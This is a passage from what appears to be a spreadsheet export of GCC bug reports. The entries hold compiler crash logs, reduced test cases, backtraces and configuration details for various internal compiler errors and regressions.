jigdo-file.cc:547: internal compiler error: tree check: expected class 'type' have 'exceptional' (error_mark) in decl_jump_unsafe at cp/decl.c:2153</t>
  </si>
  <si>
    <t>GCC-54970</t>
  </si>
  <si>
    <t>Missing DW_OP_GNU_implicit_pointer in debuginfo</t>
  </si>
  <si>
    <t>/* { dg-do run } */
/* { dg-options -g } */
#include ../nop.h
int
main ()
{
  int a[] = { 1 2 3 }        /* { dg-final { gdb-test 12 a\[1\] 2 } } */
  int *p = a + 2               /* { dg-final { gdb-test 12 a\[2\] 3 } } */
  int *q = a + 1               /* { dg-final { gdb-test 12 *p 3 } } */
  asm volatile (NOP)         /* { dg-final { gdb-test 12 *q 2 } } */
  *p += 10                     /* { dg-final { gdb-test 16 a\[1\] 2 } } */
                                /* { dg-final { gdb-test 16 a\[2\] 13 } } */
                                /* { dg-final { gdb-test 16 *p 13 } } */
  asm volatile (NOP)         /* { dg-final { gdb-test 16 *q 2 } } */
  *q += 10                     /* { dg-final { gdb-test 20 a\[1\] 12 } } */
                                /* { dg-final { gdb-test 20 a\[2\] 13 } } */
                                /* { dg-final { gdb-test 20 *p 13 } } */
  asm volatile (NOP)         /* { dg-final { gdb-test 20 *q 12 } } */
  return 0
}
fails apparently because we have # DEBUG p =&gt; &amp;MEM[(void *)&amp;a + 8B]
and we fail to expand that as (plus (debug_implicit_ptr a) (const_int 8)).
The reason for that is that we don't want (mem (debug_implicit_ptr x)) to appear
in debug insns that confuses aliasing.  When expanding &amp;a we expand it as DEBUG_IMPLICIT_PTR but when returning to MEM we return NULL as that is not appropriate thing to construct.</t>
  </si>
  <si>
    <t>GCC-81197</t>
  </si>
  <si>
    <t>[7 Regression] ICE with structured binding and lifetime-extended temporaries</t>
  </si>
  <si>
    <t>https://wandbox.org/permlink/knUzVFqc8cUizjI4
----
#include 
const auto
----
prog.cc:3:36: internal compiler error: in write_unqualified_name at cp/mangle.c:1318
 const auto
                                    ^
----
Might relate to bug 81086 but this one ICEs on both 7.1 and 8.</t>
  </si>
  <si>
    <t>ensadc</t>
  </si>
  <si>
    <t>GCC-59731</t>
  </si>
  <si>
    <t>[4.9 regression] RTL check: expected code 'set' or 'clobber' have 'parallel' in combine_reaching_defs at ree.c:711</t>
  </si>
  <si>
    <t>r206443 FAIL
r206356 PASS
Fedora 20 / x86_64
configured as:
~/src/gcc_current/configure --prefix=/usr/local/gcc_current --enable-checking=yesdffoldrtltree --enable-languages=cc++lto --enable-plugin --with-tune=native --with-arch=native --enable-version-specific-runtime-libs --enable-static --enable-multilib --with-system-zlib
/home/dimhen/src/gcc_current/libgcc/config/libbid/bid_binarydecimal.c: In function '__bid64_to_binary32':
/home/dimhen/src/gcc_current/libgcc/config/libbid/bid_binarydecimal.c:144172:1: internal compiler error: RTL check: expected code 'set' or 'clobber' have 'parallel' in combine_reaching_defs at ree.c:711
 }
 ^
0xc7a8cd rtl_check_failed_code2(rtx_def const* rtx_code rtx_code char const* int char const*)
	/home/dimhen/src/gcc_current/gcc/rtl.c:783
0x1ea1a6d combine_reaching_defs
	/home/dimhen/src/gcc_current/gcc/ree.c:711
0x1ea387e find_and_remove_re
	/home/dimhen/src/gcc_current/gcc/ree.c:957
0x1ea419c rest_of_handle_ree
	/home/dimhen/src/gcc_current/gcc/ree.c:1019
0x1ea422a execute
	/home/dimhen/src/gcc_current/gcc/ree.c:1058
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-7426</t>
  </si>
  <si>
    <t>unable to find a register to spill in class `FLOAT_REGS'</t>
  </si>
  <si>
    <t>[gb@no gcc]$ ./cc1 -O -march=athlon ice.c 
 f
ice.c: In function `f':
ice.c:11: unable to find a register to spill in class `FLOAT_REGS'
ice.c:11: this is the insn:
(insn 18 52 23 (set (subreg:SF (reg/v:DI 29 rmm0 [59]) 0)
        (minus:SF (reg:SF 8 st(0) [62])
            (mem/j:SF (symbol_ref:SI (pos)) [0 pos+0 S4 A32]))) 533 {*fop_sf_1_nosse} (insn_list 15 (nil))
    (expr_list:REG_DEAD (reg:SF 8 st(0) [62])
        (nil)))
ice.c:11: confused by earlier errors bailing out
Release:
GNU C version 3.2 2002-07-26 (prerelease) (i686-pc-linux-gnu)
Environment:
i686-mandrake-linux-gnu
How-To-Repeat:
Testcase extracted from /src/EnemyAircraft_Omni.cpp (EnemyAircraft_Omni::move).
[gb@no gcc]$ cat ice.c 
float lastMoveX
float pos[2]
extern void * target
void f()
{
  float *hpos = pos
  float diff[2] = { hpos[0] - pos[0] hpos[1] - pos[1] }
  lastMoveX = (0.9 * lastMoveX) + (0.1 * (0.01 * diff[0]))
}
Compile with -O -march=athlon to exhaust the bug. Likewise for any arch that has PTA_MMX flag but pentium-mmx.</t>
  </si>
  <si>
    <t>GCC-7055</t>
  </si>
  <si>
    <t>[alpha osf4] G++ 3.1 Produced bad debugging entries if compiled with -gcoff also segv.</t>
  </si>
  <si>
    <t>G++ produces bad debugging information when feed it the following code...
#include        
class cSocket {
private:
        std::list          *l_clients
}
int main(){
cSocket t
return(0)
}
and the following command line.
g++ -v -save-temps -ansi -gcoff -Wall -pedantic -o socket socket.cxx
You get... (Some snipped the rest avail if required.)
Reading specs from /usr/global/alphaev56-dec-osf4.0g/lib/gcc-lib/alphaev56-dec-osf4.0g/3.1/specs
Configured with: ../../source/gcc-3.1/configure --srcdir=../../source/gcc-3.1 --prefix=/usr/global --exec-prefix=/usr/global/alphaev56-dec-osf4.0g
Thread model: single
gcc version 3.1
 /usr/global/alphaev56-dec-osf4.0g/lib/gcc-lib/alphaev56-dec-osf4.0g/3.1/cpp0 -lang-c++ -D__GNUG__=3 -D__DEPRECATED -D__EXCEPTIONS -D__GXX_ABI_VERSION=100 -D__STRICT_ANSI__ -trigraphs -$ -v -iprefix /usr/global/bin/../lib/gcc-lib/alphaev56-dec-osf4.0g/3.1/ -D__GNUC__=3 -D__GNUC_MINOR__=1 -D__GNUC_PATCHLEVEL__=0 -D__unix__ -D__osf__ -D_LONGLONG -D__SYSTYPE_BSD__ -D_SYSTYPE_BSD -D__unix -D__SYSTYPE_BSD -Asystem=unix -Asystem=xpg4 -D__NO_INLINE__ -D__STDC_HOSTED__=1 -D__LANGUAGE_C_PLUS_PLUS__ -D__LANGUAGE_C_PLUS_PLUS -D__cplusplus -Acpu=alpha -Amachine=alpha -D__alpha -D__alpha__ -D__alpha_ev5__ -Acpu=ev5 -D__alpha_bwx__ -Acpu=bwx -D__EXTERN_PREFIX socket.cxx -Wall -pedantic socket.ii
GNU CPP version 3.1 (cpplib)
ignoring nonexistent directory /usr/global/lib/gcc-lib/alphaev56-dec-osf4.0g/3.1/../../../../../include/g++-v3
ignoring nonexistent directory /usr/global/lib/gcc-lib/alphaev56-dec-osf4.0g/3.1/../../../../../include/g++-v3/alphaev56-dec-osf4.0g
ignoring nonexistent directory /usr/global/lib/gcc-lib/alphaev56-dec-osf4.0g/3.1/../../../../../include/g++-v3/backward
ignoring nonexistent directory /usr/global/lib/gcc-lib/alphaev56-dec-osf4.0g/3.1/include
ignoring nonexistent directory /usr/global/lib/gcc-lib/alphaev56-dec-osf4.0g/3.1/../../../../alphaev56-dec-osf4.0g/include
ignoring nonexistent directory /usr/global/alphaev56-dec-osf4.0g/alphaev56-dec-osf4.0g/include
#include ... search starts here:
#include  search starts here:
 /usr/local/qt/include
 /usr/global/alphaev56-dec-osf4.0g/../include/g++-v3
 /usr/global/alphaev56-dec-osf4.0g/../include/g++-v3/alphaev56-dec-osf4.0g
 /usr/global/alphaev56-dec-osf4.0g/../include/g++-v3/backward
 /usr/local/include
 /usr/global/include
 /usr/global/alphaev56-dec-osf4.0g/lib/gcc-lib/alphaev56-dec-osf4.0g/3.1/include
 /usr/include
End of search list.
 /usr/global/alphaev56-dec-osf4.0g/lib/gcc-lib/alphaev56-dec-osf4.0g/3.1/cc1plus -fpreprocessed socket.ii -trigraphs -$ -quiet -dumpbase socket.cxx -ansi -gcoff -Wall -pedantic -ansi -version -o socket.s
GNU CPP version 3.1 (cpplib)
GNU C++ version 3.1 (alphaev56-dec-osf4.0g)
	compiled by GNU C version 3.1.
socket.cxx: In function `int main()':
socket.cxx:15: warning: unused variable `cSocket t'
 as -g -nocpp -O0 -o socket.o socket.s
 /usr/global/alphaev56-dec-osf4.0g/lib/gcc-lib/alphaev56-dec-osf4.0g/3.1/mips-tfile -v -I socket.o~ -o socket.o socket.s
mips-tfile version 3.1
mips-tfile socket.s:423 compiler error badly formed #.def (internal line # = 2916)
line:		#.def	.eos	.val	1	.scl	102	.tag	13__type_traitsIbE	.size	1	.endef
mips-tfile socket.s:424 compiler error badly formed #.def (internal line # = 2916)
line:		#.def	13__type_traitsIbE	.scl	13	.tag	13__type_traitsIbE	.size	1	.type	0x8	.endef
mips-tfile socket.s:426 compiler error badly formed #.def (internal line # = 2916)
line:		#.def	.eos	.val	1	.scl	102	.tag	13__type_traitsIcE	.size	1	.endef
mips-tfile socket.s:427 compiler error badly formed #.def (internal line # = 2916)
line:		#.def	13__type_traitsIcE	.scl	13	.tag	13__type_traitsIcE	.size	1	.type	0x8	.endef
mips-tfile socket.s:429 compiler error badly formed #.def (internal line # = 2916)
line:		#.def	.eos	.val	1	.scl	102	.tag	13__type_traitsIaE	.size	1	.endef
mips-tfile socket.s:430 compiler error badly formed #.def (internal line # = 2916)
line:		#.def	13__type_traitsIaE	.scl	13	.tag	13__type_traitsIaE	.size	1	.type	0x8	.endef
mips-tfile socket.s:432 compiler error badly formed #.def (internal line # = 2916)
line:		#.def	.eos	.val	1	.scl	102	.tag	13__type_traitsIhE	.size	1	.endef
...snip...
mips-tfile socket.s:504 compiler error badly formed #.def (internal line # = 2916)
line:		#.def	.eos	.val	1	.scl	102	.tag	11_Is_integerIxE	.size	1	.endef
mips-tfile socket.s:505 compiler error badly formed #.def (internal line # = 2916)
line:		#.def	11_Is_integerIxE	.scl	13	.tag	11_Is_integerIxE	.size	1	.type	0x8	.endef
mips-tfile socket.s:507 compiler error badly formed #.def (internal line # = 2916)
line:		#.def	.eos	.val	1	.scl	102	.tag	11_Is_integerIyE	.size	1	.endef
mips-tfile socket.s:508 compiler error badly formed #.def (internal line # = 2916)
line:		#.def	11_Is_integerIyE	.scl	13	.tag	11_Is_integerIyE	.size	1	.type	0x8	.endef
mips-tfile socket.s:658 Segmentation fault
line:		.end main
Release:
3.1
Environment:
System: OSF1 vodka V4.0 1530 alpha
Machine: alpha
host: alphaev56-dec-osf4.0g
build: alphaev56-dec-osf4.0g
target: alphaev56-dec-osf4.0g
configured with: ../../source/gcc-3.1/configure --srcdir=../../source/gcc-3.1 --prefix=/usr/global --exec-prefix=/usr/global/alphaev56-dec-osf4.0g</t>
  </si>
  <si>
    <t>GCC-4054</t>
  </si>
  <si>
    <t>ICE with -O2 and -march=k6 on i686-pc-linux-gnu/gcc 3.1</t>
  </si>
  <si>
    <t>gcc -v -save-temps -DX86L -O2 -march=k6 verifypt.c
eccp109/verifypt.c: In function `hardVerifyPt':
eccp109/verifypt.c:77: Unrecognizable insn:
(insn 348 290 349 (parallel[ 
            (set (reg:SI 1 edx [58])
                (const_int 0 [0x0]))
            (clobber (reg:CC 17 flags))
        ] ) -1 (nil)
    (expr_list:REG_UNUSED (reg:CC 17 flags)
        (nil)))
eccp109/verifypt.c:77: Internal compiler error in extract_insn at recog.c:2127
If I checkout (download) gcc using the CVS switch -D20010724 the error occurs. If I download using -D20010723 the error does not occur. I have verified that the error still exist as of Aug 17 2001.
Release:
gcc version 3.1 20010723 (experimental)
Environment:
Linux 2.4.5
Slackware 8.0
CPU K7 Athlon slot A 1.0 GHz
System type: i686-pc-linux-gnu
Configured with: /gcc_cvs/gcc/configure --enable-languages=c --disable-nls
How-To-Repeat:
gcc -O2 -march=k6 verifypt.i</t>
  </si>
  <si>
    <t>cain</t>
  </si>
  <si>
    <t>GCC-7464</t>
  </si>
  <si>
    <t>weak symbols alias definitions are broken in 3.1.1</t>
  </si>
  <si>
    <t>Weak alias seems to be rejected where they
were formerly accepted by gcc 3.1.
This prevents compiling glibc 2.2.5
(this PR is a duplicate of 7431 but
the given file was not preprocessed and
I wanted to give a preprocessed one.
Feel free to bind these PRs together)
and hence should certainly be fixed
before gcc 3.2 for 3.x adoption to my mind.
Joined preprocessed source :
Release:
gcc 3.1.1
Environment:
Linux 2.4.18 Glibc 2.2.5
How-To-Repeat:
gcc -c errlist.i
../sysdeps/unix/sysv/linux/errlist.c:41: weak declaration of `_old_sys_nerr' must precede definition</t>
  </si>
  <si>
    <t>GCC-12172</t>
  </si>
  <si>
    <t>[3.4 Regression] Solaris 8/SPARC libobjc bootstrap failure: SEGV in apply_args_size</t>
  </si>
  <si>
    <t>Bootstrapping current mainline on sparc-sun-solaris2.8 fails building
libobjc: 
&gt; ./libtool --mode=compile /vol/gcc/obj/gcc-3.4-20030904/8-gcc/gcc/xgcc -B/vol/gcc/obj/gcc-3.4-20030904/8-gcc/gcc/ -B/vol/gcc/share/sparc-sun-solaris2.8/bin/ -B/vol/gcc/share/sparc-sun-solaris2.8/lib/ -isystem /vol/gcc/share/sparc-sun-solaris2.8/include -isystem /vol/gcc/share/sparc-sun-solaris2.8/sys-include -fgnu-runtime -c -o NXConstStr.lo -I. -I/vol/gnu/src/gcc/gcc-dist/libobjc   -O2 -g -O2 -W -Wall -Wwrite-strings -Wstrict-prototypes -DHAVE_GTHR_DEFAULT -DIN_GCC -DIN_TARGET_LIBS -I/vol/gnu/src/gcc/gcc-dist/libobjc/objc  -I/vol/gnu/src/gcc/gcc-dist/libobjc/../gcc -I/vol/gnu/src/gcc/gcc-dist/libobjc/../gcc/config -I../../gcc -I/vol/gnu/src/gcc/gcc-dist/libobjc/../include /vol/gnu/src/gcc/gcc-dist/libobjc/NXConstStr.m -v -save-temps
/vol/gcc/obj/gcc-3.4-20030904/8-gcc/gcc/xgcc -B/vol/gcc/obj/gcc-3.4-20030904/8-gcc/gcc/ -B/vol/gcc/share/sparc-sun-solaris2.8/bin/ -B/vol/gcc/share/sparc-sun-solaris2.8/lib/ -isystem /vol/gcc/share/sparc-sun-solaris2.8/include -isystem /vol/gcc/share/sparc-sun-solaris2.8/sys-include -fgnu-runtime -c -I. -I/vol/gnu/src/gcc/gcc-dist/libobjc -O2 -g -O2 -W -Wall -Wwrite-strings -Wstrict-prototypes -DHAVE_GTHR_DEFAULT -DIN_GCC -DIN_TARGET_LIBS -I/vol/gnu/src/gcc/gcc-dist/libobjc/objc -I/vol/gnu/src/gcc/gcc-dist/libobjc/../gcc -I/vol/gnu/src/gcc/gcc-dist/libobjc/../gcc/config -I../../gcc -I/vol/gnu/src/gcc/gcc-dist/libobjc/../include /vol/gnu/src/gcc/gcc-dist/libobjc/NXConstStr.m -v -save-temps -o NXConstStr.o
Reading specs from /vol/gcc/obj/gcc-3.4-20030904/8-gcc/gcc/specs
Configured with: '/vol/gnu/src/gcc/gcc-dist/configure' '--prefix=/vol/gcc '--with-local-prefix=/vol/gcc '--disable-nls
Thread model: posix
gcc version 3.4 20030904 (experimental)
 /vol/gcc/obj/gcc-3.4-20030904/8-gcc/gcc/cc1obj -E -quiet -v -I. -I/vol/gnu/src/gcc/gcc-dist/libobjc -I/vol/gnu/src/gcc/gcc-dist/libobjc/objc -I/vol/gnu/src/gcc/gcc-dist/libobjc/../gcc -I/vol/gnu/src/gcc/gcc-dist/libobjc/../gcc/config -I../../gcc -I/vol/gnu/src/gcc/gcc-dist/libobjc/../include -iprefix /amnt/figaro/volumes/obj-gcc/gcc/obj.sol2/gcc-3.4-20030904/8-gcc/gcc/../lib/gcc/sparc-sun-solaris2.8/3.4/ -isystem /vol/gcc/obj/gcc-3.4-20030904/8-gcc/gcc/include -isystem /vol/gcc/share/sparc-sun-solaris2.8/bin/include -isystem /vol/gcc/share/sparc-sun-solaris2.8/lib/include -DHAVE_GTHR_DEFAULT -DIN_GCC -DIN_TARGET_LIBS -isystem /vol/gcc/share/sparc-sun-solaris2.8/include -isystem /vol/gcc/share/sparc-sun-solaris2.8/sys-include /vol/gnu/src/gcc/gcc-dist/libobjc/NXConstStr.m -mcpu=v7 -W -Wall -Wwrite-strings -Wstrict-prototypes -fgnu-runtime -g -O2 -O2 -o NXConstStr.mi
ignoring nonexistent directory /vol/gcc/share/sparc-sun-solaris2.8/bin/include
ignoring nonexistent directory /vol/gcc/share/sparc-sun-solaris2.8/lib/include
ignoring nonexistent directory /vol/gcc/share/sparc-sun-solaris2.8/include
ignoring nonexistent directory /vol/gcc/share/sparc-sun-solaris2.8/sys-include
ignoring nonexistent directory /amnt/figaro/volumes/obj-gcc/gcc/obj.sol2/gcc-3.4-20030904/8-gcc/gcc/../lib/gcc/sparc-sun-solaris2.8/3.4/include
ignoring nonexistent directory /vol/gcc/lib/gcc/sparc-sun-solaris2.8/3.4/include
ignoring nonexistent directory /vol/gcc/share/sparc-sun-solaris2.8/include
#include ... search starts here:
#include  search starts here:
 .
 /vol/gnu/src/gcc/gcc-dist/libobjc
 /vol/gnu/src/gcc/gcc-dist/libobjc/objc
 /vol/gnu/src/gcc/gcc-dist/libobjc/../gcc
 /vol/gnu/src/gcc/gcc-dist/libobjc/../gcc/config
 ../../gcc
 /vol/gnu/src/gcc/gcc-dist/libobjc/../include
 /vol/gcc/obj/gcc-3.4-20030904/8-gcc/gcc/include
 /vol/gcc/include
 /usr/include
End of search list.
 /vol/gcc/obj/gcc-3.4-20030904/8-gcc/gcc/cc1obj -fpreprocessed NXConstStr.mi -quiet -dumpbase NXConstStr.m -mcpu=v7 -auxbase-strip NXConstStr.o -g -O2 -O2 -W -Wall -Wwrite-strings -Wstrict-prototypes -version -fgnu-runtime -o NXConstStr.s
GNU Objective-C version 3.4 20030904 (experimental) (sparc-sun-solaris2.8)
	compiled by GNU C version 3.4 20030904 (experimental).
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
/vol/gnu/src/gcc/gcc-dist/libobjc/NXConstStr.m:43: internal compiler error: Segmentation Fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
This can be repeated with cc1obj -quiet NXConstStr.mi.
Running this under gdb reveals the following:
Program received signal SIGSEGV Segmentation fault.
apply_args_size () at /vol/gnu/src/gcc/gcc-dist/gcc/builtins.c:944
(gdb) where
#0  apply_args_size () at /vol/gnu/src/gcc/gcc-dist/gcc/builtins.c:944
#1  0x000d2374 in apply_args_register_offset (regno=24)
    at /vol/gnu/src/gcc/gcc-dist/gcc/builtins.c:915
#2  0x00049e48 in forwarding_offset (parm=0xff075580)
    at /vol/gnu/src/gcc/gcc-dist/gcc/objc/objc-act.c:2725
#3  0x00055a0c in encode_method_def (func_decl=0xff075700)
    at /vol/gnu/src/gcc/gcc-dist/gcc/objc/objc-act.c:7346
#4  0x0004c6e4 in build_dispatch_table_initializer (type=0xff07f380 
    entries=0xff075500) at /vol/gnu/src/gcc/gcc-dist/gcc/objc/objc-act.c:3877
#5  0x0004cad4 in generate_dispatch_tables ()
    at /vol/gnu/src/gcc/gcc-dist/gcc/objc/objc-act.c:4044
#6  0x00058818 in finish_objc ()
    at /vol/gnu/src/gcc/gcc-dist/gcc/objc/objc-act.c:8246
#7  0x00044610 in finish_file ()
    at /vol/gnu/src/gcc/gcc-dist/gcc/objc/objc-act.c:495
#8  0x002d8538 in compile_file ()
    at /vol/gnu/src/gcc/gcc-dist/gcc/toplev.c:1737
#9  0x002dd1c8 in do_compile () at /vol/gnu/src/gcc/gcc-dist/gcc/toplev.c:4412
#10 0x002dd2cc in toplev_main (argc=4613120 argv=0xffbef494)
    at /vol/gnu/src/gcc/gcc-dist/gcc/toplev.c:4452
(gdb) p cfun
$4 = (struct function *) 0x0
The crash happens here:
      /* The second value is the structure value address unless this is
	 passed as an invisible first argument.  */
      if (targetm.calls.struct_value_rtx (TREE_TYPE (cfun-&gt;decl) 0))
	size += GET_MODE_SIZE (Pmode)
This code fragment has been changed in DJ's recent targhooks patch:
       /* The second value is the structure value address unless this is
         passed as an invisible first argument.  */
-      if (struct_value_rtx)
+      if (targetm.calls.struct_value_rtx (TREE_TYPE (cfun-&gt;decl) 0))
        size += GET_MODE_SIZE (Pmode)
Environment:
System: SunOS padouk 5.8 Generic_108528-23 sun4u sparc SUNWSun-Fire-880
Architecture: sun4
host: sparc-sun-solaris2.8
build: sparc-sun-solaris2.8
target: sparc-sun-solaris2.8
configured with: '/vol/gnu/src/gcc/gcc-dist/configure' '--prefix=/vol/gcc '--with-local-prefix=/vol/gcc '--disable-nls
How-To-Repeat:
Bootstrap gcc as above.</t>
  </si>
  <si>
    <t>GCC-53035</t>
  </si>
  <si>
    <t>ICE with deferred-length module variable</t>
  </si>
  <si>
    <t>Bugzilla fortran tech support:
  I have attached a compressed archive that should allow you to reproduce an Internal Compiler Error. Place the file in a directory decompress it and extract its entire contents. Then enter
automake
autoconf
./configure
make
  When I do this I see the following compiling the file syspars.f90:
gfortran  -I/home/norm/opcon/gfortran/focus11-bug1-4.7.1-test-dir/include -c -v -Wall -Wextra -O3 -ffast-math -funroll-loops -std=f2003 -fno-backslash -c -o syspars.o  syspars.f90
Using built-in specs.
COLLECT_GCC=gfortran
Target: x86_64-unknown-linux-gnu
Configured with: ../gcc-4.7-source/gcc-4.7-20120414/configure --enable-languages=cc++fortran --enable-checking=release --disable-bootstrap --disable-libmudflap --enable-libgomp --enable-lto --enable-gold --with-plugin-ld=/usr/bin/gold --prefix=/usr/local/gcc-4.7
Thread model: posix
gcc version 4.7.1 20120414 (prerelease) (GCC) 
COLLECT_GCC_OPTIONS='-I' '/home/norm/opcon/gfortran/focus11-bug1-4.7.1-test-dir/include' '-c' '-v' '-Wall' '-Wextra' '-O3' '-ffast-math' '-funroll-loops' '-std=f2003' '-fno-backslash' '-c' '-o' 'syspars.o' '-mtune=generic' '-march=x86-64'
 /usr/gcc-4.7/bin/../libexec/gcc/x86_64-unknown-linux-gnu/4.7.1/f951 syspars.f90 -I /home/norm/opcon/gfortran/focus11-bug1-4.7.1-test-dir/include -quiet -dumpbase syspars.f90 -mtune=generic -march=x86-64 -auxbase-strip syspars.o -O3 -Wall -Wextra -std=f2003 -version -ffast-math -funroll-loops -fno-backslash -fintrinsic-modules-path /usr/gcc-4.7/bin/../lib/gcc/x86_64-unknown-linux-gnu/4.7.1/finclude -o /tmp/ccL2ZOZY.s
GNU Fortran (GCC) version 4.7.1 20120414 (prerelease) (x86_64-unknown-linux-gnu)
	compiled by GNU C version 4.2.1 (SUSE Linux) GMP version 4.3.2 MPFR version 2.4.2 MPC version 0.8.1
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
GNU Fortran (GCC) version 4.7.1 20120414 (prerelease) (x86_64-unknown-linux-gnu)
	compiled by GNU C version 4.2.1 (SUSE Linux) GMP version 4.3.2 MPFR version 2.4.2 MPC version 0.8.1
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
f951: internal compiler error: in lhd_set_decl_assembler_name at langhooks.c:158
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Yours truly
Norman S. Clerman</t>
  </si>
  <si>
    <t>norm.clerman</t>
  </si>
  <si>
    <t>GCC-48465</t>
  </si>
  <si>
    <t>[4.6/4.7 Regression] undefined reference to std::basic_string::_S_compare(unsigned long unsigned long)</t>
  </si>
  <si>
    <t>Created attachment 23883
reduced testcase
Compiler output:
$ g++ -finline-small-functions -O testcase.C --param=hot-bb-frequency-fraction=1
/tmp/ccRTQGpy.o: In function `foo(int int char*)':
testcase.C:(.text+0x70): undefined reference to `std::basic_string std::allocator &gt;::_S_compare(unsigned long unsigned long)'
collect2: ld returned 1 exit status
Tested revisions:
r171979 - fail
4.6 r171597 - fail
4.5 r171597 - OK</t>
  </si>
  <si>
    <t>GCC-42414</t>
  </si>
  <si>
    <t>arbitrary path modification by a sed statement breaks testsuite if testsuite is in the absolute path</t>
  </si>
  <si>
    <t>gcc/Makefile.in contains the line
        sed '/set tmpdir/ s|testsuite|$(TESTSUITEDIR)/$*|' \
                 tmp-site.exp \
which caused a large number of test failures because I had the testsuite in a path that included the word testsuite which was erroneously expanded.  Because of this the testsuite referenced a lot of invalid paths causing a ton of failures.</t>
  </si>
  <si>
    <t>GCC-23331</t>
  </si>
  <si>
    <t>FIXME from tree-ssa-ccp: dealing with a[3]</t>
  </si>
  <si>
    <t>/* We can get here for out-of-range string constant accesses
         such as _[3].  Bail out of the entire substitution search
         and arrange for the entire statement to be replaced by a
         call to __builtin_trap.  In all likelihood this will all be
         constant-folded away but in the meantime we can't leave with
         something that get_expr_operands can't understand.  */
      t = base
      STRIP_NOPS (t)
      if (TREE_CODE (t) == ADDR_EXPR
          &amp;&amp; TREE_CODE (TREE_OPERAND (t 0)) == STRING_CST)
        {
          /* FIXME: Except that this causes problems elsewhere with dead
             code not being deleted and we die in the rtl expanders
             because we failed to remove some ssa_name.  In the meantime
             just return zero.  */
          /* FIXME2: This condition should be signaled by
             fold_read_from_constant_string directly rather than
             re-checking for it here.  */
          return integer_zero_node
        }
Just a bug to track progress on this FIXME.</t>
  </si>
  <si>
    <t>GCC-81212</t>
  </si>
  <si>
    <t>[6 Regression] -Wreturn-type is disabled when used together with -fsanitize=return</t>
  </si>
  <si>
    <t>Consider this code snippet:
struct X
{
    X(void* p)
    void* p
}
X f(bool x void* p)
{
    if (x)
        return X(p)
}
Compiling it with gcc 7.1 -Wreturn-type gives a warning:
warning: control reaches end of non-void function [-Wreturn-type]
But compiling it with gcc 7.1 -Wreturn-type and -fsanitize=return gives no warning. Clang 4.0 gives the warning in both cases. It would be great if gcc gave the warning in both cases too.</t>
  </si>
  <si>
    <t>GCC-49259</t>
  </si>
  <si>
    <t>template/incomplete6.C ICE in build_target_expr</t>
  </si>
  <si>
    <t>Test g++.dg/template/incomplete6.C fails for arm-none-linux-gnueabi and arm-none-eabi:
/scratch/janisjo/arm-eabi-fsf/src/gcc-mainline/gcc/testsuite/g++.dg/template/incomplete6.C: In member function 'Int()(T()))&gt; S::f(A) [with A = int F = int (*)(...) T = templ]':
/scratch/janisjo/arm-eabi-fsf/src/gcc-mainline/gcc/testsuite/g++.dg/template/incomplete6.C:21:29:   instantiated from here
/scratch/janisjo/arm-eabi-fsf/src/gcc-mainline/gcc/testsuite/g++.dg/template/incomplete6.C:16:9: internal compiler error: in build_target_expr at cp/tree.c:296
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions
The failure starts with this patch:
    r174101 | jason | 2011-05-24 03:49:03 +0000 (Tue 24 May 2011)
        PR c++/49102
        * call.c (convert_arg_to_ellipsis): Call force_rvalue.</t>
  </si>
  <si>
    <t>GCC-51412</t>
  </si>
  <si>
    <t>[c++0x] Broken diagnostic with invalid lambda expressions</t>
  </si>
  <si>
    <t>A broken diagnostic is generated for the following invalid code snippet since GCC 4.5.0:
==========================
void foo(int)
template void bar()
{
  foo([]{}...)
}
==========================
bug.cc: In function 'void bar()':
bug.cc:5:11: error: expansion pattern '#'lambda_expr' not supported by dump_expr#' contains no argument packs
A slightly modified testcase results in a similar diagnostic:
==========================
void foo(int)
template void bar()
{
  foo([]{}=0 ...)
}
==========================
bug.cc: In function 'void bar()':
bug.cc:5:14: error: expansion pattern '(#'lambda_expr' not supported by pp_c_expression#)=0' contains no argument packs</t>
  </si>
  <si>
    <t>GCC-36777</t>
  </si>
  <si>
    <t>Protected type cannot have access taken from its body.</t>
  </si>
  <si>
    <t>Protected type cannot have access taken from its body.
The following should work:
   protected type P is
      procedure Foo
   end P
   protected body P is
      procedure Foo is
         Ptr : access P  -- here P denotes the type P
      begin
         Ptr := P'Access -- here P denotes the this instance of P
      end
   end P
The compiler complains that 'Access cannot be applied to a type which is in conflict with AARM 9.4-21/2.</t>
  </si>
  <si>
    <t>GCC-16815</t>
  </si>
  <si>
    <t>MIPS n32/n64 inefficient code for float arguments</t>
  </si>
  <si>
    <t>If you compile code using a float argument and compile with optimization for
the n32 or n64 ABIs then gcc-3.4 and later will emit code that stores the float
arg onto the stack and then  loads it back into a register.
A trivial example
float
sub (float f float g)
{
  return f + g
}
gives
        swc1    $f120($sp)
        swc1    $f1316($sp)
        lwc1    $f116($sp)
        lwc1    $f00($sp)
        add.s   $f0$f0$f1
The problem here is related to the definition of the BLOCK_REG_PADDING macro in
the mips port.  A float arg has natural alignment in a register but when
big-endian it has the wrong alignment in a stack slot.  In this case
FUNCTION_ARG_PADDING and BLOCK_REG_PADDING return different values.  There is
code in function.c in assign_parms_setup_block_p that forces values onto the
stack if they have the wrong padding but there are a number of things wrong
here.  It is testing locate-&gt;where_pad but this is from FUNCTION_ARG_PADDING
not BLOCK_REG_PADDING.  If the argument was passed in a reg then
FUNCTION_ARG_PADDING should be irrelevant here.  It should be testing
BLOCK_REG_PADDING instead and possibly only if the arg was passed in a
register.  Also there is the issue of why we are storing it to the stack
instead of just shifting it into position as is done in calls.c.  I am unsure
what the purpose of this code is so I am unsure what exact fix is needed here.
 I haven't tried to fully analyze the code yet.
I am mainly filing this to document the problem so I won't forget it.  I
noticed it while doing other work.
I don't care whether this gets fixed in gcc-3.4.</t>
  </si>
  <si>
    <t>GCC-26996</t>
  </si>
  <si>
    <t>interpret_rhs_modify_expr calls fold_convert (vector_type -1)</t>
  </si>
  <si>
    <t>We ICE on the air Polyhedron test with -march=pentium4 -ffast-math -funroll-loops -O3 -ftree-vectorize:
/space/rguenther/tramp3d/pb05/lin/source/air.f90: In function â€˜boundâ€™:
/space/rguenther/tramp3d/pb05/lin/source/air.f90:1119: internal compiler error: in fold_convert at fold-const.c:2089
#1  0x082ab8ca in fold_convert (type=0xb797d730 arg=0xb7cae7e0)
